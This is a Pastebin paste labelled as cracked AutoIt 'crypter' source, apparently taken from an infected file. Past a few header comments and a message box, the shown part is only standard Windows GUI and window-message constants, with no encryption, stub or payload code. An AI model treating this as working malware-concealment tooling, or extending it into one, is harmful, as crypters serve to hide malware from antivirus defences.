Advertisement
Linkcabin

Some Shitty AutoIt Crypter Source "Cracked"

Nov 4th, 2013
799
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 33.55 KB | None | 0 0
  1. ; Remove These Comments If You Wish
  2. ; Shitty Auto-IT Crypter Source "Cracked"
  3. ; From Infected File on LF Treat With Care
  4. ; Video: http://youtu.be/4W-DI4zEy2Y L!NKCABIN
  5. ; Have Fun!
  6. #Region
  7. #AutoIt3Wrapper_Icon=..\..\Downloads\elevee-securite-icone-9032.ico
  8. #AutoIt3Wrapper_Compression=4
  9. #AutoIt3Wrapper_UseUpx=n
  10. #AutoIt3Wrapper_Res_Comment=Fucked By Stan (C)
  11. #AutoIt3Wrapper_Res_Description=Fucked By Stan (C)
  12. #AutoIt3Wrapper_Res_Fileversion=0.0.0.0
  13. #AutoIt3Wrapper_Res_LegalCopyright=Fucked By Stan (C)
  14. #AutoIt3Wrapper_Res_Language=1070
  15. #EndRegion
  16. #Region
  17. #EndRegion
  18. #Region Constante
  19. MsgBox(0, "This is a Shity Auto it Crypter", "Cracked By Stan Marsh")
  20. Global Const $bs_groupbox = 7
  21. Global Const $bs_bottom = 2048
  22. Global Const $bs_center = 768
  23. Global Const $bs_defpushbutton = 1
  24. Global Const $bs_left = 256
  25. Global Const $bs_multiline = 8192
  26. Global Const $bs_pushbox = 10
  27. Global Const $bs_pushlike = 4096
  28. Global Const $bs_right = 512
  29. Global Const $bs_rightbutton = 32
  30. Global Const $bs_top = 1024
  31. Global Const $bs_vcenter = 3072
  32. Global Const $bs_flat = 32768
  33. Global Const $bs_icon = 64
  34. Global Const $bs_bitmap = 128
  35. Global Const $bs_notify = 16384
  36. Global Const $bs_splitbutton = 12
  37. Global Const $bs_defsplitbutton = 13
  38. Global Const $bs_commandlink = 14
  39. Global Const $bs_defcommandlink = 15
  40. Global Const $bcsif_glyph = 1
  41. Global Const $bcsif_image = 2
  42. Global Const $bcsif_style = 4
  43. Global Const $bcsif_size = 8
  44. Global Const $bcss_nosplit = 1
  45. Global Const $bcss_stretch = 2
  46. Global Const $bcss_alignleft = 4
  47. Global Const $bcss_image = 8
  48. Global Const $button_imagelist_align_left = 0
  49. Global Const $button_imagelist_align_right = 1
  50. Global Const $button_imagelist_align_top = 2
  51. Global Const $button_imagelist_align_bottom = 3
  52. Global Const $button_imagelist_align_center = 4
  53. Global Const $bs_3state = 5
  54. Global Const $bs_auto3state = 6
  55. Global Const $bs_autocheckbox = 3
  56. Global Const $bs_checkbox = 2
  57. Global Const $bs_radiobutton = 4
  58. Global Const $bs_autoradiobutton = 9
  59. Global Const $bs_ownerdraw = 11
  60. Global Const $gui_ss_default_button = 0
  61. Global Const $gui_ss_default_checkbox = 0
  62. Global Const $gui_ss_default_group = 0
  63. Global Const $gui_ss_default_radio = 0
  64. Global Const $bcm_first = 5632
  65. Global Const $bcm_getidealsize = ($bcm_first + 1)
  66. Global Const $bcm_getimagelist = ($bcm_first + 3)
  67. Global Const $bcm_getnote = ($bcm_first + 10)
  68. Global Const $bcm_getnotelength = ($bcm_first + 11)
  69. Global Const $bcm_getsplitinfo = ($bcm_first + 8)
  70. Global Const $bcm_gettextmargin = ($bcm_first + 5)
  71. Global Const $bcm_setdropdownstate = ($bcm_first + 6)
  72. Global Const $bcm_setimagelist = ($bcm_first + 2)
  73. Global Const $bcm_setnote = ($bcm_first + 9)
  74. Global Const $bcm_setshield = ($bcm_first + 12)
  75. Global Const $bcm_setsplitinfo = ($bcm_first + 7)
  76. Global Const $bcm_settextmargin = ($bcm_first + 4)
  77. Global Const $bm_click = 245
  78. Global Const $bm_getcheck = 240
  79. Global Const $bm_getimage = 246
  80. Global Const $bm_getstate = 242
  81. Global Const $bm_setcheck = 241
  82. Global Const $bm_setdontclick = 248
  83. Global Const $bm_setimage = 247
  84. Global Const $bm_setstate = 243
  85. Global Const $bm_setstyle = 244
  86. Global Const $bcn_first = -1250
  87. Global Const $bcn_dropdown = ($bcn_first + 2)
  88. Global Const $bcn_hotitemchange = ($bcn_first + 1)
  89. Global Const $bn_clicked = 0
  90. Global Const $bn_paint = 1
  91. Global Const $bn_hilite = 2
  92. Global Const $bn_unhilite = 3
  93. Global Const $bn_disable = 4
  94. Global Const $bn_doubleclicked = 5
  95. Global Const $bn_setfocus = 6
  96. Global Const $bn_killfocus = 7
  97. Global Const $bn_pushed = $bn_hilite
  98. Global Const $bn_unpushed = $bn_unhilite
  99. Global Const $bn_dblclk = $bn_doubleclicked
  100. Global Const $bst_checked = 1
  101. Global Const $bst_indeterminate = 2
  102. Global Const $bst_unchecked = 0
  103. Global Const $bst_focus = 8
  104. Global Const $bst_pushed = 4
  105. Global Const $bst_dontclick = 128
  106. Global Const $es_left = 0
  107. Global Const $es_center = 1
  108. Global Const $es_right = 2
  109. Global Const $es_multiline = 4
  110. Global Const $es_uppercase = 8
  111. Global Const $es_lowercase = 16
  112. Global Const $es_password = 32
  113. Global Const $es_autovscroll = 64
  114. Global Const $es_autohscroll = 128
  115. Global Const $es_nohidesel = 256
  116. Global Const $es_oemconvert = 1024
  117. Global Const $es_readonly = 2048
  118. Global Const $es_wantreturn = 4096
  119. Global Const $es_number = 8192
  120. Global Const $ec_err = -1
  121. Global Const $ecm_first = 5376
  122. Global Const $em_canundo = 198
  123. Global Const $em_charfrompos = 215
  124. Global Const $em_emptyundobuffer = 205
  125. Global Const $em_fmtlines = 200
  126. Global Const $em_getcuebanner = ($ecm_first + 2)
  127. Global Const $em_getfirstvisibleline = 206
  128. Global Const $em_gethandle = 189
  129. Global Const $em_getimestatus = 217
  130. Global Const $em_getlimittext = 213
  131. Global Const $em_getline = 196
  132. Global Const $em_getlinecount = 186
  133. Global Const $em_getmargins = 212
  134. Global Const $em_getmodify = 184
  135. Global Const $em_getpasswordchar = 210
  136. Global Const $em_getrect = 178
  137. Global Const $em_getsel = 176
  138. Global Const $em_getthumb = 190
  139. Global Const $em_getwordbreakproc = 209
  140. Global Const $em_hideballoontip = ($ecm_first + 4)
  141. Global Const $em_limittext = 197
  142. Global Const $em_linefromchar = 201
  143. Global Const $em_lineindex = 187
  144. Global Const $em_linelength = 193
  145. Global Const $em_linescroll = 182
  146. Global Const $em_posfromchar = 214
  147. Global Const $em_replacesel = 194
  148. Global Const $em_scroll = 181
  149. Global Const $em_scrollcaret = 183
  150. Global Const $em_setcuebanner = ($ecm_first + 1)
  151. Global Const $em_sethandle = 188
  152. Global Const $em_setimestatus = 216
  153. Global Const $em_setlimittext = $em_limittext
  154. Global Const $em_setmargins = 211
  155. Global Const $em_setmodify = 185
  156. Global Const $em_setpasswordchar = 204
  157. Global Const $em_setreadonly = 207
  158. Global Const $em_setrect = 179
  159. Global Const $em_setrectnp = 180
  160. Global Const $em_setsel = 177
  161. Global Const $em_settabstops = 203
  162. Global Const $em_setwordbreakproc = 208
  163. Global Const $em_showballoontip = ($ecm_first + 3)
  164. Global Const $em_undo = 199
  165. Global Const $ec_leftmargin = 1
  166. Global Const $ec_rightmargin = 2
  167. Global Const $ec_usefontinfo = 65535
  168. Global Const $emsis_compositionstring = 1
  169. Global Const $eimes_getcompstratonce = 1
  170. Global Const $eimes_cancelcompstrinfocus = 2
  171. Global Const $eimes_completecompstrkillfocus = 4
  172. Global Const $en_align_ltr_ec = 1792
  173. Global Const $en_align_rtl_ec = 1793
  174. Global Const $en_change = 768
  175. Global Const $en_errspace = 1280
  176. Global Const $en_hscroll = 1537
  177. Global Const $en_killfocus = 512
  178. Global Const $en_maxtext = 1281
  179. Global Const $en_setfocus = 256
  180. Global Const $en_update = 1024
  181. Global Const $en_vscroll = 1538
  182. Global Const $tti_none = 0
  183. Global Const $tti_info = 1
  184. Global Const $tti_warning = 2
  185. Global Const $tti_error = 3
  186. Global Const $tti_info_large = 4
  187. Global Const $tti_warning_large = 5
  188. Global Const $tti_error_large = 6
  189. Global Const $__editconstant_ws_vscroll = 2097152
  190. Global Const $__editconstant_ws_hscroll = 1048576
  191. Global Const $gui_ss_default_edit = BitOR($es_wantreturn, $__editconstant_ws_vscroll, $__editconstant_ws_hscroll, $es_autovscroll, $es_autohscroll)
  192. Global Const $gui_ss_default_input = BitOR($es_left, $es_autohscroll)
  193. Global Const $gui_event_close = -3
  194. Global Const $gui_event_minimize = -4
  195. Global Const $gui_event_restore = -5
  196. Global Const $gui_event_maximize = -6
  197. Global Const $gui_event_primarydown = -7
  198. Global Const $gui_event_primaryup = -8
  199. Global Const $gui_event_secondarydown = -9
  200. Global Const $gui_event_secondaryup = -10
  201. Global Const $gui_event_mousemove = -11
  202. Global Const $gui_event_resized = -12
  203. Global Const $gui_event_dropped = -13
  204. Global Const $gui_rundefmsg = "GUI_RUNDEFMSG"
  205. Global Const $gui_avistop = 0
  206. Global Const $gui_avistart = 1
  207. Global Const $gui_aviclose = 2
  208. Global Const $gui_checked = 1
  209. Global Const $gui_indeterminate = 2
  210. Global Const $gui_unchecked = 4
  211. Global Const $gui_dropaccepted = 8
  212. Global Const $gui_nodropaccepted = 4096
  213. Global Const $gui_acceptfiles = $gui_dropaccepted
  214. Global Const $gui_show = 16
  215. Global Const $gui_hide = 32
  216. Global Const $gui_enable = 64
  217. Global Const $gui_disable = 128
  218. Global Const $gui_focus = 256
  219. Global Const $gui_nofocus = 8192
  220. Global Const $gui_defbutton = 512
  221. Global Const $gui_expand = 1024
  222. Global Const $gui_ontop = 2048
  223. Global Const $gui_fontitalic = 2
  224. Global Const $gui_fontunder = 4
  225. Global Const $gui_fontstrike = 8
  226. Global Const $gui_dockauto = 1
  227. Global Const $gui_dockleft = 2
  228. Global Const $gui_dockright = 4
  229. Global Const $gui_dockhcenter = 8
  230. Global Const $gui_docktop = 32
  231. Global Const $gui_dockbottom = 64
  232. Global Const $gui_dockvcenter = 128
  233. Global Const $gui_dockwidth = 256
  234. Global Const $gui_dockheight = 512
  235. Global Const $gui_docksize = 768
  236. Global Const $gui_dockmenubar = 544
  237. Global Const $gui_dockstatebar = 576
  238. Global Const $gui_dockall = 802
  239. Global Const $gui_dockborders = 102
  240. Global Const $gui_gr_close = 1
  241. Global Const $gui_gr_line = 2
  242. Global Const $gui_gr_bezier = 4
  243. Global Const $gui_gr_move = 6
  244. Global Const $gui_gr_color = 8
  245. Global Const $gui_gr_rect = 10
  246. Global Const $gui_gr_ellipse = 12
  247. Global Const $gui_gr_pie = 14
  248. Global Const $gui_gr_dot = 16
  249. Global Const $gui_gr_pixel = 18
  250. Global Const $gui_gr_hint = 20
  251. Global Const $gui_gr_refresh = 22
  252. Global Const $gui_gr_pensize = 24
  253. Global Const $gui_gr_nobkcolor = -2
  254. Global Const $gui_bkcolor_default = -1
  255. Global Const $gui_bkcolor_transparent = -2
  256. Global Const $gui_bkcolor_lv_alternate = -33554432
  257. Global Const $gui_ws_ex_parentdrag = 1048576
  258. Global Const $ws_tiled = 0
  259. Global Const $ws_overlapped = 0
  260. Global Const $ws_maximizebox = 65536
  261. Global Const $ws_minimizebox = 131072
  262. Global Const $ws_tabstop = 65536
  263. Global Const $ws_group = 131072
  264. Global Const $ws_sizebox = 262144
  265. Global Const $ws_thickframe = 262144
  266. Global Const $ws_sysmenu = 524288
  267. Global Const $ws_hscroll = 1048576
  268. Global Const $ws_vscroll = 2097152
  269. Global Const $ws_dlgframe = 4194304
  270. Global Const $ws_border = 8388608
  271. Global Const $ws_caption = 12582912
  272. Global Const $ws_overlappedwindow = 13565952
  273. Global Const $ws_tiledwindow = 13565952
  274. Global Const $ws_maximize = 16777216
  275. Global Const $ws_clipchildren = 33554432
  276. Global Const $ws_clipsiblings = 67108864
  277. Global Const $ws_disabled = 134217728
  278. Global Const $ws_visible = 268435456
  279. Global Const $ws_minimize = 536870912
  280. Global Const $ws_child = 1073741824
  281. Global Const $ws_popup = -2147483648
  282. Global Const $ws_popupwindow = -2138570752
  283. Global Const $ds_modalframe = 128
  284. Global Const $ds_setforeground = 512
  285. Global Const $ds_contexthelp = 8192
  286. Global Const $ws_ex_acceptfiles = 16
  287. Global Const $ws_ex_mdichild = 64
  288. Global Const $ws_ex_appwindow = 262144
  289. Global Const $ws_ex_composited = 33554432
  290. Global Const $ws_ex_clientedge = 512
  291. Global Const $ws_ex_contexthelp = 1024
  292. Global Const $ws_ex_dlgmodalframe = 1
  293. Global Const $ws_ex_leftscrollbar = 16384
  294. Global Const $ws_ex_overlappedwindow = 768
  295. Global Const $ws_ex_right = 4096
  296. Global Const $ws_ex_staticedge = 131072
  297. Global Const $ws_ex_toolwindow = 128
  298. Global Const $ws_ex_topmost = 8
  299. Global Const $ws_ex_transparent = 32
  300. Global Const $ws_ex_windowedge = 256
  301. Global Const $ws_ex_layered = 524288
  302. Global Const $ws_ex_controlparent = 65536
  303. Global Const $ws_ex_layoutrtl = 4194304
  304. Global Const $ws_ex_rtlreading = 8192
  305. Global Const $wm_gettextlength = 14
  306. Global Const $wm_gettext = 13
  307. Global Const $wm_size = 5
  308. Global Const $wm_sizing = 532
  309. Global Const $wm_user = 1024
  310. Global Const $wm_create = 1
  311. Global Const $wm_destroy = 2
  312. Global Const $wm_move = 3
  313. Global Const $wm_activate = 6
  314. Global Const $wm_setfocus = 7
  315. Global Const $wm_killfocus = 8
  316. Global Const $wm_enable = 10
  317. Global Const $wm_setredraw = 11
  318. Global Const $wm_settext = 12
  319. Global Const $wm_paint = 15
  320. Global Const $wm_close = 16
  321. Global Const $wm_queryendsession = 17
  322. Global Const $wm_quit = 18
  323. Global Const $wm_erasebkgnd = 20
  324. Global Const $wm_queryopen = 19
  325. Global Const $wm_syscolorchange = 21
  326. Global Const $wm_endsession = 22
  327. Global Const $wm_showwindow = 24
  328. Global Const $wm_settingchange = 26
  329. Global Const $wm_wininichange = 26
  330. Global Const $wm_devmodechange = 27
  331. Global Const $wm_activateapp = 28
  332. Global Const $wm_fontchange = 29
  333. Global Const $wm_timechange = 30
  334. Global Const $wm_cancelmode = 31
  335. Global Const $wm_ime_startcomposition = 269
  336. Global Const $wm_ime_endcomposition = 270
  337. Global Const $wm_ime_composition = 271
  338. Global Const $wm_ime_keylast = 271
  339. Global Const $wm_setcursor = 32
  340. Global Const $wm_mouseactivate = 33
  341. Global Const $wm_childactivate = 34
  342. Global Const $wm_queuesync = 35
  343. Global Const $wm_getminmaxinfo = 36
  344. Global Const $wm_painticon = 38
  345. Global Const $wm_iconerasebkgnd = 39
  346. Global Const $wm_nextdlgctl = 40
  347. Global Const $wm_spoolerstatus = 42
  348. Global Const $wm_drawitem = 43
  349. Global Const $wm_measureitem = 44
  350. Global Const $wm_deleteitem = 45
  351. Global Const $wm_vkeytoitem = 46
  352. Global Const $wm_chartoitem = 47
  353. Global Const $wm_setfont = 48
  354. Global Const $wm_getfont = 49
  355. Global Const $wm_sethotkey = 50
  356. Global Const $wm_gethotkey = 51
  357. Global Const $wm_querydragicon = 55
  358. Global Const $wm_compareitem = 57
  359. Global Const $wm_getobject = 61
  360. Global Const $wm_compacting = 65
  361. Global Const $wm_commnotify = 68
  362. Global Const $wm_windowposchanging = 70
  363. Global Const $wm_windowposchanged = 71
  364. Global Const $wm_power = 72
  365. Global Const $wm_notify = 78
  366. Global Const $wm_copydata = 74
  367. Global Const $wm_canceljournal = 75
  368. Global Const $wm_inputlangchangerequest = 80
  369. Global Const $wm_inputlangchange = 81
  370. Global Const $wm_tcard = 82
  371. Global Const $wm_help = 83
  372. Global Const $wm_userchanged = 84
  373. Global Const $wm_notifyformat = 85
  374. Global Const $wm_parentnotify = 528
  375. Global Const $wm_entermenuloop = 529
  376. Global Const $wm_exitmenuloop = 530
  377. Global Const $wm_nextmenu = 531
  378. Global Const $wm_capturechanged = 533
  379. Global Const $wm_moving = 534
  380. Global Const $wm_powerbroadcast = 536
  381. Global Const $wm_devicechange = 537
  382. Global Const $wm_mdicreate = 544
  383. Global Const $wm_mdidestroy = 545
  384. Global Const $wm_mdiactivate = 546
  385. Global Const $wm_mdirestore = 547
  386. Global Const $wm_mdinext = 548
  387. Global Const $wm_mdimaximize = 549
  388. Global Const $wm_mditile = 550
  389. Global Const $wm_mdicascade = 551
  390. Global Const $wm_mdiiconarrange = 552
  391. Global Const $wm_mdigetactive = 553
  392. Global Const $wm_mdisetmenu = 560
  393. Global Const $wm_entersizemove = 561
  394. Global Const $wm_exitsizemove = 562
  395. Global Const $wm_dropfiles = 563
  396. Global Const $wm_mdirefreshmenu = 564
  397. Global Const $wm_ime_setcontext = 641
  398. Global Const $wm_ime_notify = 642
  399. Global Const $wm_ime_control = 643
  400. Global Const $wm_ime_compositionfull = 644
  401. Global Const $wm_ime_select = 645
  402. Global Const $wm_ime_char = 646
  403. Global Const $wm_ime_request = 648
  404. Global Const $wm_ime_keydown = 656
  405. Global Const $wm_ime_keyup = 657
  406. Global Const $wm_ncmousehover = 672
  407. Global Const $wm_mousehover = 673
  408. Global Const $wm_ncmouseleave = 674
  409. Global Const $wm_mouseleave = 675
  410. Global Const $wm_wtssession_change = 689
  411. Global Const $wm_tablet_first = 704
  412. Global Const $wm_tablet_last = 735
  413. Global Const $wm_cut = 768
  414. Global Const $wm_copy = 769
  415. Global Const $wm_paste = 770
  416. Global Const $wm_clear = 771
  417. Global Const $wm_undo = 772
  418. Global Const $wm_paletteischanging = 784
  419. Global Const $wm_hotkey = 786
  420. Global Const $wm_palettechanged = 785
  421. Global Const $wm_print = 791
  422. Global Const $wm_printclient = 792
  423. Global Const $wm_appcommand = 793
  424. Global Const $wm_querynewpalette = 783
  425. Global Const $wm_themechanged = 794
  426. Global Const $wm_handheldfirst = 856
  427. Global Const $wm_handheldlast = 863
  428. Global Const $wm_afxfirst = 864
  429. Global Const $wm_afxlast = 895
  430. Global Const $wm_penwinfirst = 896
  431. Global Const $wm_penwinlast = 911
  432. Global Const $wm_contextmenu = 123
  433. Global Const $wm_stylechanging = 124
  434. Global Const $wm_stylechanged = 125
  435. Global Const $wm_displaychange = 126
  436. Global Const $wm_geticon = 127
  437. Global Const $wm_seticon = 128
  438. Global Const $wm_nccreate = 129
  439. Global Const $wm_ncdestroy = 130
  440. Global Const $wm_nccalcsize = 131
  441. Global Const $wm_nchittest = 132
  442. Global Const $wm_ncpaint = 133
  443. Global Const $wm_ncactivate = 134
  444. Global Const $wm_getdlgcode = 135
  445. Global Const $wm_syncpaint = 136
  446. Global Const $wm_ncmousemove = 160
  447. Global Const $wm_nclbuttondown = 161
  448. Global Const $wm_nclbuttonup = 162
  449. Global Const $wm_nclbuttondblclk = 163
  450. Global Const $wm_ncrbuttondown = 164
  451. Global Const $wm_ncrbuttonup = 165
  452. Global Const $wm_ncrbuttondblclk = 166
  453. Global Const $wm_ncmbuttondown = 167
  454. Global Const $wm_ncmbuttonup = 168
  455. Global Const $wm_ncmbuttondblclk = 169
  456. Global Const $wm_ncxbuttondown = 171
  457. Global Const $wm_ncxbuttonup = 172
  458. Global Const $wm_ncxbuttondblclk = 173
  459. Global Const $wm_keydown = 256
  460. Global Const $wm_keyfirst = 256
  461. Global Const $wm_keyup = 257
  462. Global Const $wm_char = 258
  463. Global Const $wm_deadchar = 259
  464. Global Const $wm_syskeydown = 260
  465. Global Const $wm_syskeyup = 261
  466. Global Const $wm_syschar = 262
  467. Global Const $wm_sysdeadchar = 263
  468. Global Const $wm_keylast = 265
  469. Global Const $wm_unichar = 265
  470. Global Const $wm_initdialog = 272
  471. Global Const $wm_command = 273
  472. Global Const $wm_syscommand = 274
  473. Global Const $wm_timer = 275
  474. Global Const $wm_hscroll = 276
  475. Global Const $wm_vscroll = 277
  476. Global Const $wm_initmenu = 278
  477. Global Const $wm_initmenupopup = 279
  478. Global Const $wm_menuselect = 287
  479. Global Const $wm_menuchar = 288
  480. Global Const $wm_enteridle = 289
  481. Global Const $wm_menurbuttonup = 290
  482. Global Const $wm_menudrag = 291
  483. Global Const $wm_menugetobject = 292
  484. Global Const $wm_uninitmenupopup = 293
  485. Global Const $wm_menucommand = 294
  486. Global Const $wm_changeuistate = 295
  487. Global Const $wm_updateuistate = 296
  488. Global Const $wm_queryuistate = 297
  489. Global Const $wm_ctlcolormsgbox = 306
  490. Global Const $wm_ctlcoloredit = 307
  491. Global Const $wm_ctlcolorlistbox = 308
  492. Global Const $wm_ctlcolorbtn = 309
  493. Global Const $wm_ctlcolordlg = 310
  494. Global Const $wm_ctlcolorscrollbar = 311
  495. Global Const $wm_ctlcolorstatic = 312
  496. Global Const $wm_ctlcolor = 25
  497. Global Const $mn_gethmenu = 481
  498. Global Const $wm_app = 32768
  499. Global Const $nm_first = 0
  500. Global Const $nm_outofmemory = $nm_first - 1
  501. Global Const $nm_click = $nm_first - 2
  502. Global Const $nm_dblclk = $nm_first - 3
  503. Global Const $nm_return = $nm_first - 4
  504. Global Const $nm_rclick = $nm_first - 5
  505. Global Const $nm_rdblclk = $nm_first - 6
  506. Global Const $nm_setfocus = $nm_first - 7
  507. Global Const $nm_killfocus = $nm_first - 8
  508. Global Const $nm_customdraw = $nm_first - 12
  509. Global Const $nm_hover = $nm_first - 13
  510. Global Const $nm_nchittest = $nm_first - 14
  511. Global Const $nm_keydown = $nm_first - 15
  512. Global Const $nm_releasedcapture = $nm_first - 16
  513. Global Const $nm_setcursor = $nm_first - 17
  514. Global Const $nm_char = $nm_first - 18
  515. Global Const $nm_tooltipscreated = $nm_first - 19
  516. Global Const $nm_ldown = $nm_first - 20
  517. Global Const $nm_rdown = $nm_first - 21
  518. Global Const $nm_themechanged = $nm_first - 22
  519. Global Const $wm_mousefirst = 512
  520. Global Const $wm_mousemove = 512
  521. Global Const $wm_lbuttondown = 513
  522. Global Const $wm_lbuttonup = 514
  523. Global Const $wm_lbuttondblclk = 515
  524. Global Const $wm_rbuttondown = 516
  525. Global Const $wm_rbuttonup = 517
  526. Global Const $wm_rbuttondblclk = 518
  527. Global Const $wm_mbuttondown = 519
  528. Global Const $wm_mbuttonup = 520
  529. Global Const $wm_mbuttondblclk = 521
  530. Global Const $wm_mousewheel = 522
  531. Global Const $wm_xbuttondown = 523
  532. Global Const $wm_xbuttonup = 524
  533. Global Const $wm_xbuttondblclk = 525
  534. Global Const $wm_mousehwheel = 526
  535. Global Const $ps_solid = 0
  536. Global Const $ps_dash = 1
  537. Global Const $ps_dot = 2
  538. Global Const $ps_dashdot = 3
  539. Global Const $ps_dashdotdot = 4
  540. Global Const $ps_null = 5
  541. Global Const $ps_insideframe = 6
  542. Global Const $lwa_alpha = 2
  543. Global Const $lwa_colorkey = 1
  544. Global Const $rgn_and = 1
  545. Global Const $rgn_or = 2
  546. Global Const $rgn_xor = 3
  547. Global Const $rgn_diff = 4
  548. Global Const $rgn_copy = 5
  549. Global Const $errorregion = 0
  550. Global Const $nullregion = 1
  551. Global Const $simpleregion = 2
  552. Global Const $complexregion = 3
  553. Global Const $transparent = 1
  554. Global Const $opaque = 2
  555. Global Const $ccm_first = 8192
  556. Global Const $ccm_getunicodeformat = ($ccm_first + 6)
  557. Global Const $ccm_setunicodeformat = ($ccm_first + 5)
  558. Global Const $ccm_setbkcolor = $ccm_first + 1
  559. Global Const $ccm_setcolorscheme = $ccm_first + 2
  560. Global Const $ccm_getcolorscheme = $ccm_first + 3
  561. Global Const $ccm_getdroptarget = $ccm_first + 4
  562. Global Const $ccm_setwindowtheme = $ccm_first + 11
  563. Global Const $ga_parent = 1
  564. Global Const $ga_root = 2
  565. Global Const $ga_rootowner = 3
  566. Global Const $sm_cxscreen = 0
  567. Global Const $sm_cyscreen = 1
  568. Global Const $sm_cxvscroll = 2
  569. Global Const $sm_cyhscroll = 3
  570. Global Const $sm_cycaption = 4
  571. Global Const $sm_cxborder = 5
  572. Global Const $sm_cyborder = 6
  573. Global Const $sm_cxdlgframe = 7
  574. Global Const $sm_cydlgframe = 8
  575. Global Const $sm_cyvthumb = 9
  576. Global Const $sm_cxhthumb = 10
  577. Global Const $sm_cxicon = 11
  578. Global Const $sm_cyicon = 12
  579. Global Const $sm_cxcursor = 13
  580. Global Const $sm_cycursor = 14
  581. Global Const $sm_cymenu = 15
  582. Global Const $sm_cxfullscreen = 16
  583. Global Const $sm_cyfullscreen = 17
  584. Global Const $sm_cykanjiwindow = 18
  585. Global Const $sm_mousepresent = 19
  586. Global Const $sm_cyvscroll = 20
  587. Global Const $sm_cxhscroll = 21
  588. Global Const $sm_debug = 22
  589. Global Const $sm_swapbutton = 23
  590. Global Const $sm_reserved1 = 24
  591. Global Const $sm_reserved2 = 25
  592. Global Const $sm_reserved3 = 26
  593. Global Const $sm_reserved4 = 27
  594. Global Const $sm_cxmin = 28
  595. Global Const $sm_cymin = 29
  596. Global Const $sm_cxsize = 30
  597. Global Const $sm_cysize = 31
  598. Global Const $sm_cxframe = 32
  599. Global Const $sm_cyframe = 33
  600. Global Const $sm_cxmintrack = 34
  601. Global Const $sm_cymintrack = 35
  602. Global Const $sm_cxdoubleclk = 36
  603. Global Const $sm_cydoubleclk = 37
  604. Global Const $sm_cxiconspacing = 38
  605. Global Const $sm_cyiconspacing = 39
  606. Global Const $sm_menudropalignment = 40
  607. Global Const $sm_penwindows = 41
  608. Global Const $sm_dbcsenabled = 42
  609. Global Const $sm_cmousebuttons = 43
  610. Global Const $sm_secure = 44
  611. Global Const $sm_cxedge = 45
  612. Global Const $sm_cyedge = 46
  613. Global Const $sm_cxminspacing = 47
  614. Global Const $sm_cyminspacing = 48
  615. Global Const $sm_cxsmicon = 49
  616. Global Const $sm_cysmicon = 50
  617. Global Const $sm_cysmcaption = 51
  618. Global Const $sm_cxsmsize = 52
  619. Global Const $sm_cysmsize = 53
  620. Global Const $sm_cxmenusize = 54
  621. Global Const $sm_cymenusize = 55
  622. Global Const $sm_arrange = 56
  623. Global Const $sm_cxminimized = 57
  624. Global Const $sm_cyminimized = 58
  625. Global Const $sm_cxmaxtrack = 59
  626. Global Const $sm_cymaxtrack = 60
  627. Global Const $sm_cxmaximized = 61
  628. Global Const $sm_cymaximized = 62
  629. Global Const $sm_network = 63
  630. Global Const $sm_cleanboot = 67
  631. Global Const $sm_cxdrag = 68
  632. Global Const $sm_cydrag = 69
  633. Global Const $sm_showsounds = 70
  634. Global Const $sm_cxmenucheck = 71
  635. Global Const $sm_cymenucheck = 72
  636. Global Const $sm_slowmachine = 73
  637. Global Const $sm_mideastenabled = 74
  638. Global Const $sm_mousewheelpresent = 75
  639. Global Const $sm_xvirtualscreen = 76
  640. Global Const $sm_yvirtualscreen = 77
  641. Global Const $sm_cxvirtualscreen = 78
  642. Global Const $sm_cyvirtualscreen = 79
  643. Global Const $sm_cmonitors = 80
  644. Global Const $sm_samedisplayformat = 81
  645. Global Const $sm_immenabled = 82
  646. Global Const $sm_cxfocusborder = 83
  647. Global Const $sm_cyfocusborder = 84
  648. Global Const $sm_tabletpc = 86
  649. Global Const $sm_mediacenter = 87
  650. Global Const $sm_starter = 88
  651. Global Const $sm_serverr2 = 89
  652. Global Const $sm_cmetrics = 90
  653. Global Const $sm_remotesession = 4096
  654. Global Const $sm_shuttingdown = 8192
  655. Global Const $sm_remotecontrol = 8193
  656. Global Const $sm_caretblinkingenabled = 8194
  657. Global Const $blackness = 66
  658. Global Const $captureblt = 1073741824
  659. Global Const $dstinvert = 5570569
  660. Global Const $mergecopy = 12583114
  661. Global Const $mergepaint = 12255782
  662. Global Const $nomirrorbitmap = -2147483648
  663. Global Const $notsrccopy = 3342344
  664. Global Const $notsrcerase = 1114278
  665. Global Const $patcopy = 15728673
  666. Global Const $patinvert = 5898313
  667. Global Const $patpaint = 16452105
  668. Global Const $srcand = 8913094
  669. Global Const $srccopy = 13369376
  670. Global Const $srcerase = 4457256
  671. Global Const $srcinvert = 6684742
  672. Global Const $srcpaint = 15597702
  673. Global Const $whiteness = 16711778
  674. Global Const $dt_bottom = 8
  675. Global Const $dt_calcrect = 1024
  676. Global Const $dt_center = 1
  677. Global Const $dt_editcontrol = 8192
  678. Global Const $dt_end_ellipsis = 32768
  679. Global Const $dt_expandtabs = 64
  680. Global Const $dt_externalleading = 512
  681. Global Const $dt_hideprefix = 1048576
  682. Global Const $dt_internal = 4096
  683. Global Const $dt_left = 0
  684. Global Const $dt_modifystring = 65536
  685. Global Const $dt_noclip = 256
  686. Global Const $dt_nofullwidthcharbreak = 524288
  687. Global Const $dt_noprefix = 2048
  688. Global Const $dt_path_ellipsis = 16384
  689. Global Const $dt_prefixonly = 2097152
  690. Global Const $dt_right = 2
  691. Global Const $dt_rtlreading = 131072
  692. Global Const $dt_singleline = 32
  693. Global Const $dt_tabstop = 128
  694. Global Const $dt_top = 0
  695. Global Const $dt_vcenter = 4
  696. Global Const $dt_wordbreak = 16
  697. Global Const $dt_word_ellipsis = 262144
  698. Global Const $rdw_erase = 4
  699. Global Const $rdw_frame = 1024
  700. Global Const $rdw_internalpaint = 2
  701. Global Const $rdw_invalidate = 1
  702. Global Const $rdw_noerase = 32
  703. Global Const $rdw_noframe = 2048
  704. Global Const $rdw_nointernalpaint = 16
  705. Global Const $rdw_validate = 8
  706. Global Const $rdw_erasenow = 512
  707. Global Const $rdw_updatenow = 256
  708. Global Const $rdw_allchildren = 128
  709. Global Const $rdw_nochildren = 64
  710. Global Const $wm_renderformat = 773
  711. Global Const $wm_renderallformats = 774
  712. Global Const $wm_destroyclipboard = 775
  713. Global Const $wm_drawclipboard = 776
  714. Global Const $wm_paintclipboard = 777
  715. Global Const $wm_vscrollclipboard = 778
  716. Global Const $wm_sizeclipboard = 779
  717. Global Const $wm_askcbformatname = 780
  718. Global Const $wm_changecbchain = 781
  719. Global Const $wm_hscrollclipboard = 782
  720. Global Const $hterror = -2
  721. Global Const $httransparent = -1
  722. Global Const $htnowhere = 0
  723. Global Const $htclient = 1
  724. Global Const $htcaption = 2
  725. Global Const $htsysmenu = 3
